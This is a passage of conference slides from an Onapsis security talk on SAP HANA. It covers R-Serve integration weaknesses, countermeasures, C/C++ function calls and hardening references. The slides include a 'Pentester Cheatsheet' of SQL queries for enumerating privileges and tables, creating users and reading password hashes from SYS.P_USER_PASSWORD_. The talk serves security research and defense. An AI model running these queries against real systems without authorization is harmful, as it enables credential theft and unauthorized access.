  • 39. 39In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 39NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 39 • R-Serve must be configured to authenticate the connections. – No authentication means unauthenticated remote compromise of the host. – No restrictions on password strength or against bruteforce • R-Serve must be configured with transport-layer crypto, however no documentation about its support for HANA – Authentication exchange? – Sensitive information? Attacks to the R Integration
  • 40. 40In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 40NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 40 DEMOS “R-integrations”
  • 41. 41In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 41NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 41 • Secure the R-integration using transport-layer crypto • Configure authentication using strong credentials • Restrict access to Rserve using a local firewall • Use low-privileged accounts to run Rserve. • Restrict shutdown ( and system?) Countermeasures
  • 42. 42In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 42NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 42 HANA is coded in c/c++ and developers can interact with functions developed in these languages: • XSCFUNC: Interface to call c/c++ functions directly from the browser. It is used to authenticate users, among other things. • AFL (Application Function Library): • Predictive Analysis Library: Defines functions that can be called from within SQLScript procedures to perform analytic algorithms • Business Function Library: Extends the computation ability of SAP HANA with complex and performance-critical algorithms sap/hana/xs/admin/config/config.xscfunc { "library": "libxsbase", "factory": "createRuntimeConfigApp", "method": "config" } Calling C/C++ functions
  • 43. 43In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 43NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 43 Demos Post-exploitation cmd execution
  • 44. 44In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 44NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 44 Pentester Cheatsheet!
  • 45. 45In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 45NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 45 Get Version select version from M_DATABASE List Code of XSJS WebApps select CDATA from _SYS_REPO.ACTIVE_OBJECT where OBJECT_SUFFIX='xsjs' List Privileges select * from EFFECTIVE_PRIVILEGES where USER_NAME=‘USER' select * from EFFECTIVE_ROLES WHERE USER_NAME =‘USER' List Databases select DATABASE_NAME from M_DATABASE List Tables select TABLE_NAME from M_TABLES select TABLE_NAME from TABLE_COLUMNS where COLUMN_NAME LIKE '%[Q]%’ Pentester cheatsheet
  • 46. 46In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 46NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 46 List Columns select COLUMN_NAME from TABLE_COLUMNS where TABLE_NAME=[TABLE_NAME] Create User CREATE USER my_user PASSWORD [PASSWORD]; List Password Hashes select PASSWORD from SYS.P_USER_PASSWORD_ where OID=(select OID from SYS.P_USERS_ where NAME='[USERNAME]') Get Comments /*COMMENT HERE*/ -- comment after dashes Pentester cheatsheet
  • 47. 47In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 47NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 47 Conclusions
  • 48. 48In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 48NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 48 • Business critical applications (the crown jewels) are supported by the latest technologies, therefore we must know how to secure them. • With this new paradigm, the impact of vulnerabilities will be different and will depend on several other factors. Old vulns could be critical. • SAP HANA was built with a security focus, however many responsibilities rely on the users (administrators, developers, end users…) • Keep up with SAP Documentation (Thanks to the SAP PSRT): – Read the SAP HANA Security Guide : http://help.sap.com/hana/SAP_HANA_Security_Guide_en.pdf – Follow SAP HANA Security Whitepaper which gives an overview of HANA Security as a good starting point: http://www.saphana.com/docs/DOC-3751 – SAP HANA Developer Guide which contains information on secure programming practices: http://help.sap.com/hana/SAP_HANA_Security_Guide_en.pdf – A good guide which gives information on how to build standard roles in HANA: https://scn.sap.com/docs/DOC-53974 Conclusions
  • 49. 49NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 49 To the research team and specially to: • Abraham, Sergio • Perez-Etchegoyen, JP • Russ, Fernando • Sanchez, Nahuel • Vandevanter, Will Acknowledgements
  • 50. 50NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 50 Questions? egutesman@onapsis.com @gutes Thanks